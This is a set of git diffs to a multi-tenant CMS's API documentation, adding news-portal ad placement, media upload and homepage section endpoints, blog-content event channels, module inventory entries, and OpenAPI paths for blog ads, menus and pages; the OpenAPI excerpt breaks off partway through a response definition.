+| 404    | Resource not found.                                                                                                                                       | [`ApiError`](#standard-error-envelope) |
+| 422    | mediaObjectId does not exist, does not belong to this tenant, is not a verified R2 media object, or is not an allowed mime type for the target placement. | [`ApiError`](#standard-error-envelope) |
+
+### `DELETE /api/v1/news-portal/ad-placements/{id}` — Soft-delete an ad placement
+
+- **operationId**: `newsPortalAdPlacementsDelete`
+- **Security**: bearerAuth + tenantHeader
+
+Gated by news_portal.ad_placements.configure.
+
+**Parameters**
+
+| Name               | In     | Required | Type          | Description |
+| ------------------ | ------ | -------- | ------------- | ----------- |
+| `id`               | path   | yes      | string (uuid) |             |
+| `X-Correlation-ID` | header | no       | string        |             |
+
+**Request body** (required): object
+
+**Responses**
+
+| Status | Description                 | Schema                                 |
+| ------ | --------------------------- | -------------------------------------- |
+| 200    | Ad placement deleted.       | object                                 |
+| 400    | Validation error.           | [`ApiError`](#standard-error-envelope) |
+| 401    | Missing or invalid session. | [`ApiError`](#standard-error-envelope) |
+| 403    | Access denied by RBAC/ABAC. | [`ApiError`](#standard-error-envelope) |
+| 404    | Resource not found.         | [`ApiError`](#standard-error-envelope) |
+
 ## Schema appendix
 
 Every schema referenced by at least one operation above (excluding the standard envelope schemas, covered in §Standard success/error envelope).
@@ -3745,6 +4038,168 @@ A bounded, deterministic condition AST (Issue #179). A node is either a composit
   "resourceType": "string",
   "resourceId": "00000000-0000-0000-0000-000000000000",
   "resourceAttributes": "(operation-specific payload)"
+}
+```
+
+### Schema: AdPlacementCreateRequest
+
+| Field           | Type                                                                                                                                                                                                                             | Required | Nullable | Description |
+| --------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------- | -------- | ----------- |
+| `placementKey`  | enum(`header_banner`, `below_headline`, `homepage_middle`, `homepage_bottom`, `article_top`, `article_middle`, `article_bottom`, `sidebar_top`, `sidebar_middle`, `sidebar_bottom`, `category_archive_top`, `search_result_top`) | yes      | no       |             |
+| `name`          | string                                                                                                                                                                                                                           | yes      | no       |             |
+| `mediaObjectId` | string (uuid)                                                                                                                                                                                                                    | yes      | no       |             |
+| `linkUrl`       | string                                                                                                                                                                                                                           | no       | yes      |             |
+| `rotationMode`  | enum(`latest`, `priority`, `random_safe`, `weighted`)                                                                                                                                                                            | no       | no       |             |
+| `priority`      | integer                                                                                                                                                                                                                          | no       | no       |             |
+| `isActive`      | boolean                                                                                                                                                                                                                          | no       | no       |             |
+| `startsAt`      | string (date-time)                                                                                                                                                                                                               | no       | yes      |             |
+| `endsAt`        | string (date-time)                                                                                                                                                                                                               | no       | yes      |             |
+
+**Example**
+
+```json
+{
+  "placementKey": "header_banner",
+  "name": "string",
+  "mediaObjectId": "00000000-0000-0000-0000-000000000000",
+  "linkUrl": "https://example.com/resource",
+  "rotationMode": "latest",
+  "priority": 0,
+  "isActive": false,
+  "startsAt": "2026-01-01T00:00:00.000Z",
+  "endsAt": "2026-01-01T00:00:00.000Z"
+}
+```
+
+### Schema: AdPlacementUpdateRequest
+
+| Field           | Type                                                                                                                                                                                                                             | Required | Nullable | Description |
+| --------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------- | -------- | ----------- |
+| `placementKey`  | enum(`header_banner`, `below_headline`, `homepage_middle`, `homepage_bottom`, `article_top`, `article_middle`, `article_bottom`, `sidebar_top`, `sidebar_middle`, `sidebar_bottom`, `category_archive_top`, `search_result_top`) | no       | no       |             |
+| `name`          | string                                                                                                                                                                                                                           | no       | no       |             |
+| `mediaObjectId` | string (uuid)                                                                                                                                                                                                                    | no       | no       |             |
+| `linkUrl`       | string                                                                                                                                                                                                                           | no       | yes      |             |
+| `rotationMode`  | enum(`latest`, `priority`, `random_safe`, `weighted`)                                                                                                                                                                            | no       | no       |             |
+| `priority`      | integer                                                                                                                                                                                                                          | no       | no       |             |
+| `isActive`      | boolean                                                                                                                                                                                                                          | no       | no       |             |
+| `startsAt`      | string (date-time)                                                                                                                                                                                                               | no       | yes      |             |
+| `endsAt`        | string (date-time)                                                                                                                                                                                                               | no       | yes      |             |
+
+**Example**
+
+```json
+{
+  "placementKey": "header_banner",
+  "name": "string",
+  "mediaObjectId": "00000000-0000-0000-0000-000000000000",
+  "linkUrl": "https://example.com/resource",
+  "rotationMode": "latest",
+  "priority": 0,
+  "isActive": false,
+  "startsAt": "2026-01-01T00:00:00.000Z",
+  "endsAt": "2026-01-01T00:00:00.000Z"
+}
+```
+
+### Schema: CreateNewsMediaUploadSessionRequest
+
+| Field              | Type    | Required | Nullable | Description                                                                                                                                                                      |
+| ------------------ | ------- | -------- | -------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| `mimeType`         | string  | yes      | no       | Must be one of the deployment's configured NEWS_MEDIA_R2_ALLOWED_MIME_TYPES (default: image/jpeg, image/png, image/webp, image/gif — image/svg+xml is never allowed by default). |
+| `byteSize`         | integer | yes      | no       | Claimed size in bytes — shape-only check against NEWS_MEDIA_R2_MAX_UPLOAD_BYTES; the real size is re-checked from R2 itself at finalize time.                                    |
+| `originalFilename` | string  | no       | yes      | Stored as display-only metadata — never part of the server-generated object key.                                                                                                 |
+| `altText`          | string  | no       | yes      |                                                                                                                                                                                  |
+| `caption`          | string  | no       | yes      |                                                                                                                                                                                  |
+
+**Example**
+
+```json
+{
+  "mimeType": "image/jpeg",
+  "byteSize": 1,
+  "originalFilename": "string",
+  "altText": "string",
+  "caption": "string"
+}
+```
+
+### Schema: FinalizeNewsMediaUploadSessionRequest
+
+| Field            | Type   | Required | Nullable | Description                                                                                                                                                                                              |
+| ---------------- | ------ | -------- | -------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| `checksumSha256` | string | no       | yes      | Optional. When supplied, compared against the checksum computed server-side from the bytes actually read from R2 — a transport-corruption check only, never a substitute for the server-side MIME sniff. |
+
+**Example**
+
+```json
+{
+  "checksumSha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
+}
+```
+
+### Schema: HomepageSectionConfig
+
+Shape depends on sectionType — headline: {postId}; latest_posts: {limit?, categorySlug?}; featured_posts/editor_picks: {postIds: []}; category_grid: {categorySlugs: [], postsPerCategory?}; gallery_block: {mediaObjectIds: [], caption?}. Validated server-side per sectionType; every id/slug must already exist for the same tenant, and gallery_block's mediaObjectIds must each be a verified R2 media object.
+
+Shape depends on sectionType — headline: {postId}; latest_posts: {limit?, categorySlug?}; featured_posts/editor_picks: {postIds: []}; category_grid: {categorySlugs: [], postsPerCategory?}; gallery_block: {mediaObjectIds: [], caption?}. Validated server-side per sectionType; every id/slug must already exist for the same tenant, and gallery_block's mediaObjectIds must each be a verified R2 media object.
+
+**Example**
+
+```json
+{}
+```
+
+### Schema: HomepageSectionCreateRequest
+
+| Field         | Type                                                                                                 | Required | Nullable | Description |
+| ------------- | ---------------------------------------------------------------------------------------------------- | -------- | -------- | ----------- |
+| `sectionKey`  | string                                                                                               | yes      | no       |             |
+| `sectionType` | enum(`headline`, `latest_posts`, `featured_posts`, `editor_picks`, `category_grid`, `gallery_block`) | yes      | no       |             |
+| `title`       | string                                                                                               | no       | yes      |             |
+| `config`      | [`HomepageSectionConfig`](#schema-homepagesectionconfig)                                             | yes      | no       |             |
+| `sortOrder`   | integer                                                                                              | no       | no       |             |
+| `isEnabled`   | boolean                                                                                              | no       | no       |             |
+| `startsAt`    | string (date-time)                                                                                   | no       | yes      |             |
+| `endsAt`      | string (date-time)                                                                                   | no       | yes      |             |
+
+**Example**
+
+```json
+{
+  "sectionKey": "string",
+  "sectionType": "headline",
+  "title": "string",
+  "config": "(operation-specific payload)",
+  "sortOrder": 0,
+  "isEnabled": false,
+  "startsAt": "2026-01-01T00:00:00.000Z",
+  "endsAt": "2026-01-01T00:00:00.000Z"
+}
+```
+
+### Schema: HomepageSectionUpdateRequest
+
+sectionType cannot be changed after creation — omit it, do not send the old or a new value.
+
+| Field       | Type                                                     | Required | Nullable | Description |
+| ----------- | -------------------------------------------------------- | -------- | -------- | ----------- |
+| `title`     | string                                                   | no       | yes      |             |
+| `config`    | [`HomepageSectionConfig`](#schema-homepagesectionconfig) | no       | no       |             |
+| `sortOrder` | integer                                                  | no       | no       |             |
+| `isEnabled` | boolean                                                  | no       | no       |             |
+| `startsAt`  | string (date-time)                                       | no       | yes      |             |
+| `endsAt`    | string (date-time)                                       | no       | yes      |             |
+
+**Example**
+
+```json
+{
+  "title": "string",
+  "config": "(operation-specific payload)",
+  "sortOrder": 0,
+  "isEnabled": false,
+  "startsAt": "2026-01-01T00:00:00.000Z",
+  "endsAt": "2026-01-01T00:00:00.000Z"
 }
 ```
 

--- a/docs/awcms/api-reference.md
+++ b/docs/awcms/api-reference.md
@@ -3828,8 +3828,35 @@ consumer/subscriber contract in this file).
 }
 ```
 
-### Channels (14)
+### Channels (41)
 
+- `awcms.blog-content.ad.created` — An advertisement was created. Documented contract only; producer is `pages/api/v1/blog/ads/index.ts`'s `blog-content.ad.created` log line.
+- `awcms.blog-content.ad.deleted` — An advertisement was soft-deleted. Documented contract only; producer is `pages/api/v1/blog/ads/[id].ts`'s `blog-content.ad.deleted` log line.
+- `awcms.blog-content.ad.updated` — An advertisement (or its placements) was updated. Documented contract only; producer is `pages/api/v1/blog/ads/[id].ts`'s `blog-content.ad.updated` log line.
+- `awcms.blog-content.internal-tag-linking-policy.updated` — A tenant's automatic internal tag linking policy was updated. Documented contract only; producer is `pages/api/v1/blog/internal-tag-links/settings.ts`'s `blog-content.internal-tag-linking-policy.updated` log line.
+- `awcms.blog-content.menu.created` — A navigation menu was created. Documented contract only; producer is `pages/api/v1/blog/menus/index.ts`'s `blog-content.menu.created` log line.
+- `awcms.blog-content.menu.deleted` — A navigation menu was soft-deleted. Documented contract only; producer is `pages/api/v1/blog/menus/[id].ts`'s `blog-content.menu.deleted` log line.
+- `awcms.blog-content.menu.updated` — A navigation menu (or its items tree) was updated. Documented contract only; producer is `pages/api/v1/blog/menus/[id].ts`'s `blog-content.menu.updated` log line.
+- `awcms.blog-content.post.archived` — A blog post was archived. Documented contract only; producer is `pages/api/v1/blog/posts/[id]/archive.ts`'s `blog-content.post.archived` log line.
+- `awcms.blog-content.post.created` — A blog post was created (draft). Ported from awcms-mini. Documented contract only, same structured-logger-producer convention as `awcms.email.*` above; producer is `pages/api/v1/blog/posts/index.ts`'s `blog-content.post.created` log line.
+- `awcms.blog-content.post.deleted` — A blog post was soft-deleted. Documented contract only; producer is `pages/api/v1/blog/posts/[id].ts`'s `blog-content.post.deleted` log line.
+- `awcms.blog-content.post.published` — A blog post was published (manually or by the scheduled-publish job). Documented contract only; producer is `pages/api/v1/blog/posts/[id]/publish.ts` / `application/blog-scheduled-publish.ts`'s `blog-content.post.published` log line.
+- `awcms.blog-content.post.purged` — A soft-deleted blog post was permanently purged. Documented contract only; producer is `pages/api/v1/blog/posts/[id]/purge.ts`'s `blog-content.post.purged` log line.
+- `awcms.blog-content.post.restored` — A soft-deleted blog post was restored. Documented contract only; producer is `pages/api/v1/blog/posts/[id]/restore.ts`'s `blog-content.post.restored` log line.
+- `awcms.blog-content.post.scheduled` — A blog post was scheduled for future publishing. Documented contract only; producer is `pages/api/v1/blog/posts/[id]/schedule.ts`'s `blog-content.post.scheduled` log line.
+- `awcms.blog-content.post.submitted-for-review` — A blog post transitioned draft -> review. Documented contract only; producer is `pages/api/v1/blog/posts/[id]/submit-review.ts`'s `blog-content.post.submitted-for-review` log line.
+- `awcms.blog-content.post.updated` — A blog post was updated. Documented contract only; producer is `pages/api/v1/blog/posts/[id].ts`'s `blog-content.post.updated` log line.
+- `awcms.blog-content.revision.created` — An append-only revision snapshot was created for a post/page (a significant content change, or a revision restore). Documented contract only; producer is `application/blog-revision-directory.ts`'s `blog-content.revision.created` log line.
+- `awcms.blog-content.settings.updated` — A tenant's blog settings were updated. Documented contract only; producer is `pages/api/v1/blog/settings/index.ts`'s `blog-content.settings.updated` log line.
+- `awcms.blog-content.template.created` — A presentation template was created. Documented contract only; producer is `pages/api/v1/blog/templates/index.ts`'s `blog-content.template.created` log line.
+- `awcms.blog-content.template.deleted` — A presentation template was soft-deleted. Documented contract only; producer is `pages/api/v1/blog/templates/[id].ts`'s `blog-content.template.deleted` log line.
+- `awcms.blog-content.template.updated` — A presentation template was updated. Documented contract only; producer is `pages/api/v1/blog/templates/[id].ts`'s `blog-content.template.updated` log line.
+- `awcms.blog-content.term.created` — A blog category/tag was created. Documented contract only; producer is `pages/api/v1/blog/terms/index.ts`'s `blog-content.term.created` log line.
+- `awcms.blog-content.term.updated` — A blog category/tag was updated or soft-deleted. Documented contract only; producer is `pages/api/v1/blog/terms/[id].ts`'s `blog-content.term.updated` log line.
+- `awcms.blog-content.theme.updated` — A tenant's blog theme mode override was updated. Documented contract only; producer is `pages/api/v1/blog/theme/index.ts`'s `blog-content.theme.updated` log line.
+- `awcms.blog-content.widget.created` — A widget was created. Documented contract only; producer is `pages/api/v1/blog/widgets/index.ts`'s `blog-content.widget.created` log line.
+- `awcms.blog-content.widget.deleted` — A widget was soft-deleted. Documented contract only; producer is `pages/api/v1/blog/widgets/[id].ts`'s `blog-content.widget.deleted` log line.
+- `awcms.blog-content.widget.updated` — A widget was updated. Documented contract only; producer is `pages/api/v1/blog/widgets/[id].ts`'s `blog-content.widget.updated` log line.
 - `awcms.domain-event-runtime.sample.recorded` — Reference/example event used to exercise the domain-event-runtime outbox, dispatcher, ordering, retry/backoff, dead-letter, and replay mechanism end-to-end. Real producer modules publish their OWN event types the same way, via `appendDomainEvent` — this one is intentionally self-contained rather than tied to another module's business logic in this foundation module (see `src/modules/domain-event-runtime/domain/event-type-registry.ts`'s own doc comment). Producer: any caller of `application/append-domain-event.ts`'s `appendDomainEvent` for this event type; consumers: `infrastructure/consumer-registry.ts`'s two reference consumers (a same-process cross-module audit projector and a self-contained read-model activity-rollup projection).
 - `awcms.email.message.cancelled` — An operator cancelled a still-queued message (`POST /api/v1/email/messages/{id}/cancel`) before dispatch. Documented contract only; producer is the structured JSON logger (`pages/api/v1/email/messages/[id]/cancel.ts`'s `email.message.cancelled` log line).
 - `awcms.email.message.failed` — The email dispatcher exhausted retries (or hit a non-retryable failure) for a queued message. Documented contract only; producer is the structured JSON logger (`email/application/email-dispatch.ts`'s `email.dispatch.failed` log line).

--- a/docs/awcms/module-composition-inventory.json
+++ b/docs/awcms/module-composition-inventory.json
@@ -1,8 +1,40 @@
 {
-  "moduleCount": 11,
+  "moduleCount": 12,
   "valid": true,
   "issueCount": 0,
   "modules": [
+    {
+      "key": "blog_content",
+      "name": "Blog Content",
+      "version": "0.9.0",
+      "status": "active",
+      "type": "domain",
+      "dependencies": [
+        "tenant_admin",
+        "identity_access",
+        "module_management",
+        "logging"
+      ],
+      "capabilitiesProvided": ["public_content"],
+      "capabilitiesConsumed": [
+        {
+          "capability": "news_media",
+          "providedBy": "news_portal",
+          "optional": true
+        },
+        {
+          "capability": "social_publishing",
+          "providedBy": "social_publishing",
+          "optional": true
+        }
+      ],
+      "permissionCount": 39,
+      "navigationCount": 1,
+      "jobCount": 1,
+      "hasHealthCheck": false,
+      "hasReadinessCheck": false,
+      "deploymentProfiles": null
+    },
     {
       "key": "domain_event_runtime",
       "name": "Domain Event Runtime",

--- a/docs/awcms/module-composition-inventory.json
+++ b/docs/awcms/module-composition-inventory.json
@@ -1,5 +1,5 @@
 {
-  "moduleCount": 12,
+  "moduleCount": 13,
   "valid": true,
   "issueCount": 0,
   "modules": [
@@ -116,6 +116,33 @@
       "capabilitiesConsumed": [],
       "permissionCount": 12,
       "navigationCount": 0,
+      "jobCount": 1,
+      "hasHealthCheck": false,
+      "hasReadinessCheck": false,
+      "deploymentProfiles": null
+    },
+    {
+      "key": "news_portal",
+      "name": "News Portal",
+      "version": "0.4.0",
+      "status": "active",
+      "type": "domain",
+      "dependencies": [
+        "tenant_admin",
+        "identity_access",
+        "module_management",
+        "logging"
+      ],
+      "capabilitiesProvided": ["news_media"],
+      "capabilitiesConsumed": [
+        {
+          "capability": "public_content",
+          "providedBy": "blog_content",
+          "optional": false
+        }
+      ],
+      "permissionCount": 13,
+      "navigationCount": 2,
       "jobCount": 1,
       "hasHealthCheck": false,
       "hasReadinessCheck": false,

--- a/openapi/awcms-public-api.openapi.yaml
+++ b/openapi/awcms-public-api.openapi.yaml
@@ -1731,6 +1731,2177 @@ paths:
             application/json:
               schema:
                 $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/ads:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogListAds
+      summary: List this tenant's advertisements
+      description: Gated by blog_content.ads.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Matching ads.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+                    properties:
+                      ads:
+                        type: array
+                        items:
+                          type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    post:
+      tags:
+        - Blog Content
+      operationId: blogCreateAd
+      summary: Create an advertisement
+      description: Gated by blog_content.ads.configure. imageUrl/linkUrl must be absolute http(s) URLs (never raw HTML/embed markup). Optionally seeds its initial placements (global|widget|post|page; targetId required except for global).
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              required:
+                - name
+                - imageUrl
+              properties:
+                name:
+                  type: string
+                imageUrl:
+                  type: string
+                linkUrl:
+                  type: string
+                  nullable: true
+                isActive:
+                  type: boolean
+                startsAt:
+                  type: string
+                  format: date-time
+                  nullable: true
+                endsAt:
+                  type: string
+                  format: date-time
+                  nullable: true
+                placements:
+                  type: array
+                  items:
+                    $ref: "#/components/schemas/BlogAdPlacement"
+      responses:
+        "200":
+          description: Ad created.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+  /api/v1/blog/ads/{id}:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdateAd
+      summary: Update an advertisement (and/or its placements)
+      description: Gated by blog_content.ads.configure. Providing placements replaces the whole set.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              properties:
+                name:
+                  type: string
+                imageUrl:
+                  type: string
+                linkUrl:
+                  type: string
+                  nullable: true
+                isActive:
+                  type: boolean
+                startsAt:
+                  type: string
+                  format: date-time
+                  nullable: true
+                endsAt:
+                  type: string
+                  format: date-time
+                  nullable: true
+                placements:
+                  type: array
+                  items:
+                    $ref: "#/components/schemas/BlogAdPlacement"
+      responses:
+        "200":
+          description: Ad updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+    delete:
+      tags:
+        - Blog Content
+      operationId: blogDeleteAd
+      summary: Soft delete an advertisement
+      description: Gated by blog_content.ads.configure.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Ad soft-deleted.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/internal-tag-links/settings:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogGetInternalTagLinkSettings
+      summary: Read this tenant's automatic internal tag linking policy
+      description: Gated by blog_content.internal_links.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The policy.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogInternalTagLinkSettings"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdateInternalTagLinkSettings
+      summary: Update this tenant's automatic internal tag linking policy
+      description: Gated by blog_content.internal_links.configure. disabledTagIds are validated against this tenant's own tag catalog.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              properties:
+                enabled:
+                  type: boolean
+                caseInsensitive:
+                  type: boolean
+                disabledTagIds:
+                  type: array
+                  items:
+                    type: string
+                    format: uuid
+      responses:
+        "200":
+          description: Policy updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogInternalTagLinkSettings"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+  /api/v1/blog/menus:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogListMenus
+      summary: List this tenant's navigation menus (with items)
+      description: Gated by blog_content.menus.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Matching menus.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+                    properties:
+                      menus:
+                        type: array
+                        items:
+                          type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    post:
+      tags:
+        - Blog Content
+      operationId: blogCreateMenu
+      summary: Create a navigation menu
+      description: Gated by blog_content.menus.configure. Optionally seeds its initial items tree (one level of nesting; link_type post|page|url gates target_id/url).
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              required:
+                - key
+                - name
+              properties:
+                key:
+                  type: string
+                name:
+                  type: string
+                items:
+                  type: array
+                  items:
+                    $ref: "#/components/schemas/BlogMenuItem"
+      responses:
+        "200":
+          description: Menu created.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "409":
+          description: A menu already exists for this key.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/menus/{id}:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdateMenu
+      summary: Update a navigation menu (name and/or its items tree)
+      description: Gated by blog_content.menus.configure. Providing items replaces the whole tree.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              properties:
+                name:
+                  type: string
+                items:
+                  type: array
+                  items:
+                    $ref: "#/components/schemas/BlogMenuItem"
+      responses:
+        "200":
+          description: Menu updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+    delete:
+      tags:
+        - Blog Content
+      operationId: blogDeleteMenu
+      summary: Soft delete a navigation menu
+      description: Gated by blog_content.menus.configure.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Menu soft-deleted.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/pages:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogListPages
+      summary: List this tenant's non-deleted blog pages
+      description: Gated by blog_content.pages.read. Optional ?status= filter, ?limit= bounded.
+      parameters:
+        - name: status
+          in: query
+          schema:
+            type: string
+            enum:
+              - draft
+              - review
+              - scheduled
+              - published
+              - archived
+        - name: limit
+          in: query
+          schema:
+            type: integer
+            minimum: 1
+            maximum: 100
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Matching pages.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+                    properties:
+                      pages:
+                        type: array
+                        items:
+                          $ref: "#/components/schemas/BlogPage"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    post:
+      tags:
+        - Blog Content
+      operationId: blogCreatePage
+      summary: Create a draft blog page
+      description: Gated by blog_content.pages.create. Not idempotency-keyed (caught by the (tenant_id, locale, slug) partial unique index).
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/BlogPageWriteInput"
+      responses:
+        "200":
+          description: Page created.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogPage"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "409":
+          description: A page already exists for this slug/locale.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "422":
+          description: One or more image references are not valid R2 media objects in full-online R2-only mode.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/pages/{id}:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    get:
+      tags:
+        - Blog Content
+      operationId: blogGetPage
+      summary: Read one blog page
+      description: Gated by blog_content.pages.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The page.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogPage"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdatePage
+      summary: Update a blog page
+      description: Gated by blog_content.pages.update. Only fields present in the body are changed. A significant change snapshots an append-only revision first.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/BlogPageWriteInput"
+      responses:
+        "200":
+          description: Page updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogPage"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "422":
+          description: One or more image references are not valid R2 media objects in full-online R2-only mode.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+    delete:
+      tags:
+        - Blog Content
+      operationId: blogDeletePage
+      summary: Soft delete a blog page
+      description: Gated by blog_content.pages.delete.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Page soft-deleted.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogPage"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/pages/{id}/quality-checklist:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    get:
+      tags:
+        - Blog Content
+      operationId: blogGetPageQualityChecklist
+      summary: Preview the content quality checklist for a page
+      description: Read-only preview for the admin editor. Gated by blog_content.pages.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The checklist result.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
